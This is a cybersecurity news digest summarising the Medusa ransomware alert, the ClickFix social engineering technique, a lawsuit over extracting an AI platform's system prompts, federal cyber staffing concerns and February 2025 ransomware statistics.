Medusa Ransomware Made 300 Critical Infrastructure Victims
Medusa was initially operated as a closed ransomware, and, although it is currently using an affiliate model, ransom negotiations are still conducted by the malware developers, CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) note in a joint alert. The group engages in double extortion, encrypting victims’ data but also stealing it and threatening to leak it unless a ransom is paid. Medusa’s operators offer payments ranging between $100 and $1 million to affiliates working exclusively for them, the three agencies say.
ClickFix Widely Adopted by Cybercriminals, APT Groups
ClickFix is a social engineering technique in which malicious JavaScript code on web pages prompts the user to perform an action that results in the delivery of a malicious payload. Typically, the user sees a prompt instructing them to perform an update, fix an error, or verify that they are human on a fake reCAPTCHA page containing malicious code. The malicious JavaScript code copies a command to the clipboard, and the user is instructed to open the Windows Run dialogue by pressing Win+R, paste the clipboard content using the Ctrl+V key combination, and hit Enter.
Trade Secrets Law Is Awkward Fit in AI Prompt-Hacking Lawsuit
A medical AI company’s novel trade secrets lawsuit accusing a rival of prompting its platform to reveal how it was built illustrates the challenges artificial intelligence presents for protecting proprietary information. OpenEvidence Inc. in its complaint accused Pathway Medical inc. of stealing medical credentials to gain access to its AI tool and employing prompts to have it reveal the “system prompts” OpenEvidence had used to create the platform. The suit levels claims including computer fraud, breach of contract, and hacking to gain access to copyrighted material, but the trade secrets claim stood out to attorneys and law professors as the most interesting.
If White House attempts to gut science and technology entities are successful, China will be poised to cripple U.S. communications, economic transactions, infrastructure, and even military operations, current and former government cybersecurity officials told Defense One. Recent White House efforts to fire workers across the federal government and freeze agencies’ spending hit another roadblock Thursday when a U.S. District Court judge ruled that planned firings of probationary workers across the government are unlawful. Last week, a different judge ruled that the Trump Administration doesn’t have the authority to freeze agency funding without Congress.
February was the worst month on record for ransomware attacks – and one threat group had a field day
February 2025 was the worst month on record for the number of ransomware attacks, according to new research from Bitdefender. Analysis from the security company shows the number of ransomware attacks reached 962 last month, marking a significant increase on the year prior in which 425 attacks were recorded. Of those, 335 were claimed by the Ransomware as a Service (RaaS) group Clop – three times as many as the previous month.
